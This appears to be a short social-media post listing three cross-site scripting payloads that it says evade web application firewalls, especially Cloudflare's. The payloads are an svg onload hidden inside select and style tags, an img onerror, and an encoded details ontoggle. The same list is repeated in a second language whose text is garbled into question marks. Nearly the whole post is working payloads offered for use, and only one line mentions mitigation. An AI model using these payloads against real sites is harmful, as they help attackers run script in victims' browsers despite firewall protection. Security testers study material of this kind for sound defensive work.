These payloads can be used for XSS WAF Bypass, especially on Cloudflare. The payloads are:
1. <select><style></select>
<svg onload=alert(1)></style>
2. ">><img src=x onerrora=confirm() onerror=confirm(1)>
3. <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin) x>
These payloads can potentially evade the Cloudflare WAF protection. It's important to address and mitigate these vulnerabilities to ensure the security of the application.
???????? ??? ????? ???? XSS WAF Bypass ?????? cloudflare ???? ????? ?? ??? ?????? ??? ???? ????:
1.<select><style></select>
<svg onload=alert(1)>
</style>
2. "><img src=x onerrora=confirm() onerror=confirm(1)>
3.<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>— Maryam (@Mari_Mzfry) April 11, 2024